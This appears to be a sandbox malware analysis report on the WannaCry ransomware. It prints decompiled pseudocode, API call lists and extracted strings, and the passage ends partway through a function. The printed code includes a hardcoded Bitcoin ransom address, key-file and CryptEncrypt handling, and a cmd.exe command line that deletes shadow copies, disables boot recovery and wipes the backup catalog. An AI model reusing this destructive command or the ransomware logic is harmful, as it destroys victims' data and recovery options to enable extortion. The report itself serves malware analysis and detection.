                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #800$MessageSend$#537#924sprintf$#3874#540AttributesDefaultFileInfoLangLocaleUser
                                                      • String ID: English
                                                      • API String ID: 600832625-3812506524
                                                      • Opcode ID: 98bbcc99f84d21185ee3b515649f036d805e480a8587630640b34afead2fff3e
                                                      • Instruction ID: 12cb8a10269d81aa60d086da51d7e65d8080bc449a50ca3d57c6290c1d86febe
                                                      • Opcode Fuzzy Hash: 98bbcc99f84d21185ee3b515649f036d805e480a8587630640b34afead2fff3e
                                                      • Instruction Fuzzy Hash: F911D3717402006BEB149634DC42BAB7795EBD4720F54863EFE5AEB2D0D9F8A8098794
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004064D0 Relevance: 44.0, APIs: 20, Strings: 5, Instructions: 256stringwindowtimeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 87 4064d0-40651b #4710 SendMessageA * 2 call 401c70 90 406577-40658a call 401a10 87->90 91 40651d-40655b GetModuleFileNameA strrchr 87->91 96 4065e8-406609 call 402c40 __p___argc 90->96 97 40658c-4065e5 time call 401a10 90->97 92 40656c-406571 SetCurrentDirectoryA 91->92 93 40655d-406569 strrchr 91->93 92->90 93->92 103 40678c-4067ef call 407e80 SetWindowTextW call 406f80 call 406c20 SetTimer * 2 96->103 104 40660f-40661e __p___argv 96->104 97->96 106 406621-406629 104->106 107 406649-40664b 106->107 108 40662b-40662d 106->108 112 40664e-406650 107->112 110 406645-406647 108->110 111 40662f-406639 108->111 110->112 111->107 114 40663b-406643 111->114 115 406661-40666a __p___argv 112->115 116 406652-40665b call 407f80 ExitProcess 112->116 114->106 114->110 119 40666d-406675 115->119 122 406695-406697 119->122 123 406677-406679 119->123 125 40669a-40669c 122->125 126 406691-406693 123->126 127 40667b-406685 123->127 128 4066ad-4066b6 __p___argv 125->128 129 40669e-4066a7 call 4080c0 ExitProcess 125->129 126->125 127->122 130 406687-40668f 127->130 132 4066b9-4066c1 128->132 130->119 130->126 134 4066e1-4066e3 132->134 135 4066c3-4066c5 132->135 138 4066e6-4066e8 134->138 136 4066c7-4066d1 135->136 137 4066dd-4066df 135->137 136->134 139 4066d3-4066db 136->139 137->138 138->103 140 4066ee-406736 Sleep call 401bb0 138->140 139->132 139->137 143 406750-406781 sprintf call 401a90 140->143 144 406738-40674e call 401b50 140->144 149 406784-406786 ExitProcess 143->149 144->149
                                                      C-Code - Quality: 71%
                                                      			E004064D0(intOrPtr __ecx, void* __fp0) {
				char _v1032;
				char _v1424;
				void _v2256;
				void _v2456;
				void _v2707;
				char _v2708;
				intOrPtr _v2720;
				short _v2724;
				int _t48;
				int _t49;
				intOrPtr* _t50;
				intOrPtr _t60;
				intOrPtr _t63;
				intOrPtr _t66;
				short _t70;
				void* _t82;
				char* _t87;
				char* _t89;
				intOrPtr _t90;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr _t100;
				intOrPtr _t105;
				char _t122;
				intOrPtr _t134;
				intOrPtr _t135;
				intOrPtr _t136;
				intOrPtr* _t140;
				intOrPtr* _t141;
				intOrPtr* _t142;
				intOrPtr* _t161;
				intOrPtr* _t162;
				intOrPtr* _t163;
				void* _t165;
				void* _t167;
				intOrPtr* _t168;
				void* _t169;
				void* _t170;
				void* _t171;
				void* _t201;

				_t201 = __fp0;
				_t90 = __ecx; // executed
				L00412CB0(); // executed
				SendMessageA( *(__ecx + 0x20), 0x80, 1,  *(__ecx + 0x82c)); // executed
				SendMessageA( *(_t90 + 0x20), 0x80, 0,  *(_t90 + 0x82c)); // executed
				_t48 = E00401C70(0);
				_t170 = _t169 + 4;
				if(_t48 == 0) {
					_t122 =  *0x421798; // 0x0
					_v2708 = _t122;
					memset( &_v2707, _t48, 0x40 << 2);
					asm("stosw");
					asm("stosb");
					GetModuleFileNameA(0,  &_v2708, 0x104);
					_t87 = strrchr( &_v2708, 0x5c);
					_t170 = _t170 + 0x14;
					if(_t87 != 0) {
						_t89 = strrchr( &_v2708, 0x5c);
						_t170 = _t170 + 8;
						 *_t89 = 0;
					}
					SetCurrentDirectoryA( &_v2708);
				}
				_t167 = _t90 + 0x50c;
				_t49 = E00401A10(_t167, 1);
				_t171 = _t170 + 8;
				if(_t49 == 0) {
					memset(_t167, _t49, 0xc3 << 2);
					asm("repne scasb");
					_t165 = "13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94";
					_t82 = memcpy(_t165 + 0x175b75a, _t165, memcpy(_t90 + 0x5be, _t165, 0 << 2) & 0x00000003);
					 *((intOrPtr*)(_t90 + 0x584)) = 0x43960000;
					 *(_t90 + 0x588) = 0;
					__imp__time(0);
					 *(_t90 + 0x578) = _t82;
					E00401A10(_t167, 0);
					_t171 = _t171 + 0x30;
				}
				_t50 = E00402C40();
				__imp__#115(0x202,  &_v1424); // executed
				__imp____p___argc();
				if( *_t50 > 1) {
					_t168 = __imp____p___argv;
					_t140 = "fi";
					_t161 =  *((intOrPtr*)( *((intOrPtr*)( *_t168())) + 4));
					while(1) {
						_t98 =  *_t161;
						_t60 = _t98;
						if(_t98 !=  *_t140) {
							break;
						}
						if(_t60 == 0) {
							L12:
							_t60 = 0;
						} else {
							_t136 =  *((intOrPtr*)(_t161 + 1));
							_t22 = _t140 + 1; // 0x31000069
							_t60 = _t136;
							if(_t136 !=  *_t22) {
								break;
							} else {
								_t161 = _t161 + 2;
								_t140 = _t140 + 2;
								if(_t60 != 0) {
									continue;
								} else {
									goto L12;
								}
							}
						}
						L14:
						if(_t60 == 0) {
							E00407F80(_t90);
							ExitProcess(0);
						}
						_t141 = "co";
						_t162 =  *((intOrPtr*)( *((intOrPtr*)( *_t168())) + 4));
						while(1) {
							_t99 =  *_t162;
							_t63 = _t99;
							if(_t99 !=  *_t141) {
								break;
							}
							if(_t63 == 0) {
								L21:
								_t63 = 0;
							} else {
								_t135 =  *((intOrPtr*)(_t162 + 1));
								_t25 = _t141 + 1; // 0x6600006f
								_t63 = _t135;
								if(_t135 !=  *_t25) {
									break;
								} else {
									_t162 = _t162 + 2;
									_t141 = _t141 + 2;
									if(_t63 != 0) {
										continue;
									} else {
										goto L21;
									}
								}
							}
							L23:
							if(_t63 == 0) {
								E004080C0(_t90);
								ExitProcess(0);
							}
							_t142 = "vs";
							_t163 =  *((intOrPtr*)( *((intOrPtr*)( *_t168())) + 4));
							while(1) {
								_t100 =  *_t163;
								_t66 = _t100;
								if(_t100 !=  *_t142) {
									break;
								}
								if(_t66 == 0) {
									L30:
									_t66 = 0;
								} else {
									_t134 =  *((intOrPtr*)(_t163 + 1));
									_t28 = _t142 + 1; // 0x63000073
									_t66 = _t134;
									if(_t134 !=  *_t28) {
										break;
									} else {
										_t163 = _t163 + 2;
										_t142 = _t142 + 2;
										if(_t66 != 0) {
											continue;
										} else {
											goto L30;
										}
									}
								}
								L32:
								if(_t66 == 0) {
									Sleep(0x2710);
									memset( &_v2256, memcpy( &_v2456, "/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet", 0x32 << 2), 0xce << 2);
									_t70 = "cmd.exe"; // 0x2e646d63
									_t105 =  *0x420fd4; // 0x657865
									_v2724 = _t70;
									_v2720 = _t105;
									if(E00401BB0() != 0) {
										_push( &_v2456);
										_push( &_v2724);
										sprintf( &_v1032, "%s %s");
										E00401A90( &_v1032, 0, 0);
									} else {
										E00401B50( &_v2724,  &_v2456, _t71);
									}
									ExitProcess(0);
								}
								goto L37;
							}
							asm("sbb eax, eax");
							asm("sbb eax, 0xffffffff");
							goto L32;
						}
						asm("sbb eax, eax");
						asm("sbb eax, 0xffffffff");
						goto L23;
					}
					asm("sbb eax, eax");
					asm("sbb eax, 0xffffffff");
					goto L14;
				}
				L37:
				E00407E80();
				SetWindowTextW( *(_t90 + 0x20), L"Wana Decrypt0r 2.0"); // executed
				E00406F80(_t90, _t201);
				E00406C20(_t90);
				SetTimer( *(_t90 + 0x20), 0x3e9, 0x3e8, 0); // executed
				SetTimer( *(_t90 + 0x20), 0x3ea, 0x7530, 0); // executed
				 *0x42189c = _t90;
				return 1;
			}











































                                                      0x004064d0
                                                      0x004064da
                                                      0x004064dc
                                                      0x004064f9
                                                      0x0040650d
                                                      0x00406511
                                                      0x00406516
                                                      0x0040651b
                                                      0x0040651d
                                                      0x00406527
                                                      0x00406530
                                                      0x00406532
                                                      0x00406540
                                                      0x00406541
                                                      0x00406554
                                                      0x00406556
                                                      0x0040655b
                                                      0x00406564
                                                      0x00406566
                                                      0x00406569
                                                      0x00406569
                                                      0x00406571
                                                      0x00406571
                                                      0x00406577
                                                      0x00406580
                                                      0x00406585
                                                      0x0040658a
                                                      0x00406593
                                                      0x0040659d
                                                      0x004065ab
                                                      0x004065bb
                                                      0x004065bd
                                                      0x004065c7
                                                      0x004065d1
                                                      0x004065da
                                                      0x004065e0
                                                      0x004065e5
                                                      0x004065e5
                                                      0x004065e8
                                                      0x004065fa
                                                      0x00406600
                                                      0x00406609
                                                      0x0040660f
                                                      0x00406615
                                                      0x0040661e
                                                      0x00406621
                                                      0x00406621
                                                      0x00406625
                                                      0x00406629
                                                      0x00000000
                                                      0x00000000
                                                      0x0040662d
                                                      0x00406645
                                                      0x00406645
                                                      0x0040662f
                                                      0x0040662f
                                                      0x00406632
                                                      0x00406635
                                                      0x00406639
                                                      0x00000000
                                                      0x0040663b
                                                      0x0040663b
                                                      0x0040663e
                                                      0x00406643
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00406643
                                                      0x00406639
                                                      0x0040664e
                                                      0x00406650
                                                      0x00406654
                                                      0x0040665b
                                                      0x0040665b
                                                      0x00406661
                                                      0x0040666a
                                                      0x0040666d
                                                      0x0040666d
                                                      0x00406671
                                                      0x00406675
                                                      0x00000000
                                                      0x00000000
                                                      0x00406679
                                                      0x00406691
                                                      0x00406691
                                                      0x0040667b
                                                      0x0040667b
                                                      0x0040667e
                                                      0x00406681
                                                      0x00406685
                                                      0x00000000
                                                      0x00406687
                                                      0x00406687
                                                      0x0040668a
                                                      0x0040668f
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040668f
                                                      0x00406685
                                                      0x0040669a
                                                      0x0040669c
                                                      0x004066a0
                                                      0x004066a7
                                                      0x004066a7
                                                      0x004066ad
                                                      0x004066b6
                                                      0x004066b9
                                                      0x004066b9
                                                      0x004066bd
                                                      0x004066c1
                                                      0x00000000
                                                      0x00000000
                                                      0x004066c5
                                                      0x004066dd
                                                      0x004066dd
                                                      0x004066c7
                                                      0x004066c7
                                                      0x004066ca
                                                      0x004066cd
                                                      0x004066d1
                                                      0x00000000
                                                      0x004066d3
                                                      0x004066d3
                                                      0x004066d6
                                                      0x004066db
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004066db
                                                      0x004066d1
                                                      0x004066e6
                                                      0x004066e8
                                                      0x004066f3
                                                      0x0040671a
                                                      0x0040671c
                                                      0x00406721
                                                      0x00406727
                                                      0x0040672b
                                                      0x00406736
                                                      0x0040675b
                                                      0x0040675c
                                                      0x0040676a
                                                      0x0040677c
                                                      0x00406738
                                                      0x00406746
                                                      0x0040674b
                                                      0x00406786
                                                      0x00406786
                                                      0x00000000
                                                      0x004066e8
                                                      0x004066e1
                                                      0x004066e3
                                                      0x00000000
                                                      0x004066e3
                                                      0x00406695
                                                      0x00406697
                                                      0x00000000
                                                      0x00406697
                                                      0x00406649
                                                      0x0040664b
                                                      0x00000000
                                                      0x0040664b
                                                      0x0040678c
                                                      0x0040678e
                                                      0x0040679c
                                                      0x004067a4
                                                      0x004067ab
                                                      0x004067c6
                                                      0x004067d8
                                                      0x004067dc
                                                      0x004067ef

                                                      APIs
                                                      • #4710.MFC42 ref: 004064DC
                                                      • SendMessageA.USER32(?,00000080,00000001,?), ref: 004064F9
                                                      • SendMessageA.USER32(?,00000080,00000000,?), ref: 0040650D
                                                        • Part of subcall function 00401C70: wcscat.MSVCRT ref: 00401CC1
                                                        • Part of subcall function 00401C70: RegCreateKeyW.ADVAPI32(80000001,?,?), ref: 00401D00
                                                        • Part of subcall function 00401C70: GetCurrentDirectoryA.KERNEL32(00000207,?), ref: 00401D2A
                                                        • Part of subcall function 00401C70: RegSetValueExA.ADVAPI32(?,0041FDC4,00000000,00000001,?), ref: 00401D53
                                                        • Part of subcall function 00401C70: RegCloseKey.KERNELBASE(00000000), ref: 00401DA3
                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00406541
                                                      • strrchr.MSVCRT ref: 00406554
                                                      • strrchr.MSVCRT ref: 00406564
                                                      • SetCurrentDirectoryA.KERNEL32(?), ref: 00406571
                                                      • time.MSVCRT ref: 004065D1
                                                      • __p___argc.MSVCRT(00000202,?), ref: 004065FA
                                                      • __p___argv.MSVCRT ref: 0040661A
                                                      • ExitProcess.KERNEL32 ref: 0040665B
                                                      • __p___argv.MSVCRT ref: 00406666
                                                      • ExitProcess.KERNEL32 ref: 004066A7
                                                      • __p___argv.MSVCRT ref: 004066B2
                                                      • Sleep.KERNEL32(00002710), ref: 004066F3
                                                      • sprintf.MSVCRT ref: 0040676A
                                                      • ExitProcess.KERNEL32 ref: 00406786
                                                      • SetWindowTextW.USER32(?,Wana Decrypt0r 2.0), ref: 0040679C
                                                      • SetTimer.USER32(?,000003E9,000003E8,00000000), ref: 004067C6
                                                      • SetTimer.USER32(?,000003EA,00007530,00000000), ref: 004067D8
                                                      Strings
                                                      • /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, xrefs: 004066FE
                                                      • Wana Decrypt0r 2.0, xrefs: 00406796
                                                      • 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94, xrefs: 00406595
                                                      • %s %s, xrefs: 00406764
                                                      • cmd.exe, xrefs: 0040671C
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitProcess__p___argv$CurrentDirectoryMessageSendTimerstrrchr$#4710CloseCreateFileModuleNameSleepTextValueWindow__p___argcsprintftimewcscat
                                                      • String ID: %s %s$/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet$13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94$Wana Decrypt0r 2.0$cmd.exe
                                                      • API String ID: 623806192-606506946
                                                      • Opcode ID: ae9b914f860960fc1fe1eb8876ac2c32c64d9403cfc96aba4f43f79c31e3e0e0
                                                      • Instruction ID: 76468553a1f47653d6b265dfd970fa21b418b24b97d30d9546a7e2687b9e40c0
                                                      • Opcode Fuzzy Hash: ae9b914f860960fc1fe1eb8876ac2c32c64d9403cfc96aba4f43f79c31e3e0e0
                                                      • Instruction Fuzzy Hash: 72816C35704301ABD7109F309C41BEB7B95AF99304F15493AFD4AAB3D1DA7AE8188B98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004012E0 Relevance: 37.0, APIs: 15, Strings: 6, Instructions: 202fileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      C-Code - Quality: 54%
                                                      			E004012E0(void* __ecx) {
				int _v4;
				intOrPtr _v12;
				void _v2059;
				void _v2060;
				void _v2192;
				void _v2196;
				intOrPtr _v2324;
				void _v2328;
				void _v2332;
				char _v2364;
				char _v2396;
				char _v2436;
				char _v2468;
				char _v2508;
				char _v2540;
				intOrPtr _t61;
				long _t65;
				struct _IO_FILE* _t68;
				struct _IO_FILE* _t76;
				struct _IO_FILE* _t83;
				int _t85;
				intOrPtr _t88;
				struct _IO_FILE* _t91;
				int _t97;
				void* _t100;
				char* _t123;
				void _t131;
				struct _IO_FILE* _t143;
				struct _IO_FILE* _t146;
				struct _IO_FILE* _t149;
				void* _t154;
				signed int _t156;
				signed int _t157;
				intOrPtr _t161;
				void* _t164;
				void* _t166;
				void* _t169;
				void* _t172;

				_push(0xffffffff);
				_push(E004134A6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t161;
				_t61 =  *0x42189c; // 0x19f608
				_push(_t156);
				_t154 = __ecx;
				_t3 = _t61 + 0x50c; // 0x19fb14
				_t100 = _t3;
				sprintf( &_v2468, "%08X.pky",  *((intOrPtr*)(__ecx + 0xa4)));
				sprintf( &_v2540, "%08X.dky",  *((intOrPtr*)(_t154 + 0xa4)));
				_t164 = _t161 - 0x9e0 + 0x18;
				_t65 = GetFileAttributesA( &_v2540); // executed
				_t157 = _t156 | 0xffffffff;
				if(_t65 == _t157) {
					L4:
					_v2196 = 0;
					memset( &_v2192, 0, 0x21 << 2);
					_t68 = fopen("00000000.res", "rb"); // executed
					_t143 = _t68;
					_t166 = _t164 + 0x14;
					__eflags = _t143;
					if(_t143 != 0) {
						fread( &_v2196, 0x88, 1, _t143); // executed
						fclose(_t143); // executed
						_v2332 = 0;
						memset( &_v2328, 0, 0x21 << 2);
						sprintf( &_v2364, "%08X.res",  *((intOrPtr*)(_t154 + 0xa4)));
						_t76 = fopen( &_v2364, "rb"); // executed
						_t146 = _t76;
						_t169 = _t166 + 0x34;
						__eflags = _t146;
						if(_t146 != 0) {
							fread( &_v2332, 0x88, 1, _t146); // executed
							fclose(_t146);
							_t131 =  *0x421798; // 0x0
							_v2060 = _t131;
							memset( &_v2059, 0, 0x1ff << 2);
							asm("stosw");
							asm("stosb");
							sprintf( &_v2396, "%08X.eky",  *((intOrPtr*)(_t154 + 0xa4)));
							_t83 = fopen( &_v2396, "rb"); // executed
							_t149 = _t83;
							_t172 = _t169 + 0x34;
							__eflags = _t149;
							if(_t149 != 0) {
								_t85 = fread( &_v2060, 1, 0x800, _t149); // executed
								fclose(_t149);
								_t39 = _t100 + 0x242; // 0x19fd56
								_t40 = _t100 + 0x1de; // 0x19fcf2
								E0040BE90("s.wnry", _t40, _t39);
								_t88 =  *0x42189c; // 0x19f608
								_push( *((intOrPtr*)(_t154 + 0x20)));
								_push( &_v2540);
								_push( *((intOrPtr*)(_t88 + 0x818)));
								_push( *((intOrPtr*)(_t88 + 0x81c)));
								_t46 = _t100 + 0xb2; // 0x19fbc6
								_push(_t85);
								_push( &_v2060);
								_push(_v2324);
								_push( &_v2332);
								_push( &_v2196);
								_push(_t100 + 0xe4);
								_t91 = E0040C240( &_v2332, __eflags);
								_t172 = _t172 + 0x4c;
								_t83 = E0040C670();
								__eflags = _t91;
								if(_t91 >= 0) {
									E00404640( &_v2436);
									_v4 = 1;
									_t94 = E004047C0( &_v2436,  &_v2468,  &_v2540);
									__eflags = _t94;
									if(_t94 == 0) {
										 *(_t154 + 0xa8) = 1;
									} else {
										 *(_t154 + 0xa8) = 2;
									}
									_v4 = 0xffffffff;
									_t123 =  &_v2436;
									goto L15;
								}
							} else {
								 *(_t154 + 0xa8) = 0xffffffff;
							}
						} else {
							 *(_t154 + 0xa8) = 0xffffffff;
						}
					} else {
						 *(_t154 + 0xa8) = _t157;
					}
				} else {
					E00404640( &_v2508);
					_v4 = 0;
					if(E004047C0( &_v2508,  &_v2468,  &_v2540) == 0) {
						_t97 = DeleteFileA( &_v2540);
						_v4 = _t157;
						E00404690(_t97,  &_v2508);
						goto L4;
					} else {
						 *(_t154 + 0xa8) = 2;
						_v4 = _t157;
						_t123 =  &_v2508;
						L15:
						_t83 = E00404690(_t94, _t123);
					}
				}
				 *[fs:0x0] = _v12;
				return _t83;
			}









































                                                      0x004012e6
                                                      0x004012e8
                                                      0x004012ed
                                                      0x004012ee
                                                      0x004012fb
                                                      0x00401305
                                                      0x00401307
                                                      0x00401316
                                                      0x00401316
                                                      0x00401323
                                                      0x00401339
                                                      0x0040133b
                                                      0x00401343
                                                      0x00401349
                                                      0x0040134e
                                                      0x004013b0
                                                      0x004013be
                                                      0x004013d3
                                                      0x004013d5
                                                      0x004013db
                                                      0x004013dd
                                                      0x004013e0
                                                      0x004013e2
                                                      0x00401405
                                                      0x00401408
                                                      0x0040141c
                                                      0x00401427
                                                      0x00401440
                                                      0x00401453
                                                      0x00401459
                                                      0x0040145b
                                                      0x0040145e
                                                      0x00401460
                                                      0x00401481
                                                      0x00401484
                                                      0x0040148a
                                                      0x0040149e
                                                      0x004014a8
                                                      0x004014aa
                                                      0x004014ac
                                                      0x004014c1
                                                      0x004014d4
                                                      0x004014da
                                                      0x004014dc
                                                      0x004014df
                                                      0x004014e1
                                                      0x00401502
                                                      0x00401507
                                                      0x0040150d
                                                      0x00401513
                                                      0x00401520
                                                      0x00401525
                                                      0x0040152d
                                                      0x0040153e
                                                      0x0040153f
                                                      0x00401547
                                                      0x00401548
                                                      0x00401556
                                                      0x00401557
                                                      0x0040155f
                                                      0x00401567
                                                      0x0040156e
                                                      0x0040156f
                                                      0x00401570
                                                      0x00401575
                                                      0x0040157a
                                                      0x0040157f
                                                      0x00401581
                                                      0x00401587
                                                      0x004015a2
                                                      0x004015a9
                                                      0x004015ae
                                                      0x004015b0
                                                      0x004015be
                                                      0x004015b2
                                                      0x004015b2
                                                      0x004015b2
                                                      0x004015c4
                                                      0x004015cf
                                                      0x00000000
                                                      0x004015cf
                                                      0x004014e3
                                                      0x004014e3
                                                      0x004014e3
                                                      0x00401462
                                                      0x00401462
                                                      0x00401462
                                                      0x004013e4
                                                      0x004013e4
                                                      0x004013e4
                                                      0x00401350
                                                      0x00401354
                                                      0x00401367
                                                      0x00401379
                                                      0x0040139a
                                                      0x004013a4
                                                      0x004013ab
                                                      0x00000000
                                                      0x0040137b
                                                      0x0040137b
                                                      0x00401385
                                                      0x0040138c
                                                      0x004015d3
                                                      0x004015d3
                                                      0x004015d3
                                                      0x00401379
                                                      0x004015e3
                                                      0x004015f0

                                                      APIs
                                                      • sprintf.MSVCRT ref: 00401323
                                                      • sprintf.MSVCRT ref: 00401339
                                                      • GetFileAttributesA.KERNELBASE(?), ref: 00401343
                                                      • DeleteFileA.KERNEL32(?), ref: 0040139A
                                                      • fread.MSVCRT ref: 00401405
                                                      • fclose.MSVCRT ref: 00401408
                                                      • sprintf.MSVCRT ref: 00401440
                                                      • fopen.MSVCRT ref: 00401453
                                                        • Part of subcall function 00404690: DeleteCriticalSection.KERNEL32(?,004015D8), ref: 0040469A
                                                      • fopen.MSVCRT ref: 004013D5
                                                        • Part of subcall function 00404640: InitializeCriticalSection.KERNEL32(?,?,0040158C), ref: 00404658
                                                        • Part of subcall function 004047C0: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,00000001,00000200,?,?,?,00000001,?,0019FA30), ref: 004048DB
                                                        • Part of subcall function 004047C0: _local_unwind2.MSVCRT ref: 004048EB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: sprintf$CriticalDeleteFileSectionfopen$AttributesCryptEncryptInitialize_local_unwind2fclosefread
                                                      • String ID: %08X.dky$%08X.eky$%08X.pky$%08X.res$00000000.res$s.wnry
                                                      • API String ID: 2787528210-4016014174
                                                      • Opcode ID: 57a51ecc688d2c0761643bc18b0e2b9a7bca0d11f95f7de6ced9b52eb20b7f63
                                                      • Instruction ID: 5d668cda142e4e69bdcb8de65b1bf6b3866dc1aa9a0cfc7ced8feefa58b75360
                                                      • Opcode Fuzzy Hash: 57a51ecc688d2c0761643bc18b0e2b9a7bca0d11f95f7de6ced9b52eb20b7f63
                                                      • Instruction Fuzzy Hash: 8A71BFB1104741AFD320DB60CC85FEBB3E9ABC4310F404A3EE59A87290EB78A4498B56
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004076A0 Relevance: 35.2, APIs: 14, Strings: 6, Instructions: 239windowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 183 4076a0-4076d5 184 4076d9-407714 time 183->184 185 407716-40771c 184->185 186 40771e 184->186 187 407724-40773b 185->187 186->187 188 40775b 187->188 189 40773d-407745 187->189 192 40775f-407761 188->192 190 407747-40774d 189->190 191 40774f 189->191 195 407753-407755 190->195 191->195 193 407763-40776b 192->193 194 40776d 192->194 196 407771-407819 sprintf 193->196 194->196 195->192 197 407757-407759 195->197 198 407828-407832 196->198 199 40781b-407826 196->199 197->192 200 407833-40783c call 405180 198->200 199->200 203 407842-407892 SendMessageA * 2 #540 200->203 204 4076d7 200->204 205 4078a0-4078a8 203->205 206 407894-407896 203->206 204->184 207 4078aa-4078d9 _ftol #2818 * 2 205->207 208 4078db-40790e #2818 * 2 205->208 206->205 209 407911-40793e #3092 #6199 207->209 208->209 210 407990-4079bc #800 209->210 211 407940-407950 call 4079c0 209->211 211->210 214 407952-40798b InvalidateRect call 405920 * 2 211->214 214->210
                                                      C-Code - Quality: 63%
                                                      			E004076A0(void* __ecx) {
				intOrPtr _t89;
				char _t90;
				intOrPtr _t91;
				signed int _t94;
				intOrPtr _t98;
				signed int _t99;
				intOrPtr _t125;
				signed int _t133;
				void* _t136;
				intOrPtr _t139;
				signed int _t143;
				signed int _t147;
				void* _t148;
				intOrPtr _t161;
				signed int _t192;
				intOrPtr _t193;
				signed int _t196;
				signed int _t197;
				signed int _t198;
				intOrPtr _t200;
				intOrPtr _t202;
				void* _t204;
				intOrPtr _t206;
				void* _t207;
				void* _t208;
				void* _t209;
				void* _t210;
				void* _t211;
				void* _t213;
				long long _t225;

				_push(0xffffffff);
				_push(E00413EBB);
				_t89 =  *[fs:0x0];
				_push(_t89);
				 *[fs:0x0] = _t206;
				_t207 = _t206 - 0x8c;
				_t196 = 0;
				_t136 = __ecx;
				 *((intOrPtr*)(_t207 + 0x14)) = 0;
				 *((intOrPtr*)(_t207 + 0x18)) = 0;
				 *(_t207 + 0x1c) = 0;
				 *(_t207 + 0x20) = 0;
				_t204 = 0;
				L2:
				__imp__time(_t196);
				_t139 = M00421120; // 0x30303b30
				_t161 = _t89;
				_t90 = "00;00;00;00"; // 0x303b3030
				 *((intOrPtr*)(_t207 + 0x40)) = _t139;
				 *(_t207 + 0x3c) = _t90;
				_t91 =  *0x421124; // 0x30303b
				 *((intOrPtr*)(_t207 + 0x44)) = _t91;
				_t208 = _t207 + 4;
				 *(_t208 + 0x24) = _t196;
				memset(_t208 + 0x44, 0, 0x16 << 2);
				_t209 = _t208 + 0xc;
				if(_t204 != 0) {
					_t94 =  *(_t136 + 0x580);
				} else {
					_t94 =  *(_t136 + 0x57c);
				}
				_t98 =  *((intOrPtr*)(_t136 + 0x578));
				_t143 = _t94 + _t94 * 2 + (_t94 + _t94 * 2) * 4 + (_t94 + _t94 * 2 + (_t94 + _t94 * 2) * 4) * 4 + (_t94 + _t94 * 2 + (_t94 + _t94 * 2) * 4 + (_t94 + _t94 * 2 + (_t94 + _t94 * 2) * 4) * 4) * 8 << 7;
				if(_t161 <= _t98) {
					_t99 =  *(_t209 + 0x24);
				} else {
					_t133 = _t98 - _t161 + _t143;
					_t196 = _t133;
					if(_t196 <= 0) {
						_t99 =  *(_t209 + 0x24);
					} else {
						asm("cdq");
						_t99 = _t133 * 0x64 / _t143;
					}
					if(_t196 < 0) {
						_t196 = 0;
					}
				}
				if(_t204 != 0) {
					 *(_t209 + 0x20) = _t99;
				} else {
					 *(_t209 + 0x14) = _t196;
					 *(_t209 + 0x1c) = _t99;
				}
				 *(_t209 + 0x2e) = ((0xc22e4507 * _t196 >> 0x20) + _t196 >> 0x10) + ((0xc22e4507 * _t196 >> 0x20) + _t196 >> 0x10 >> 0x1f);
				_t147 =  *(_t209 + 0x2e) & 0x0000ffff;
				_t197 = _t196 + ( ~((_t147 << 4) - _t147) +  ~((_t147 << 4) - _t147) * 4 + ( ~((_t147 << 4) - _t147) +  ~((_t147 << 4) - _t147) * 4) * 8 << 7);
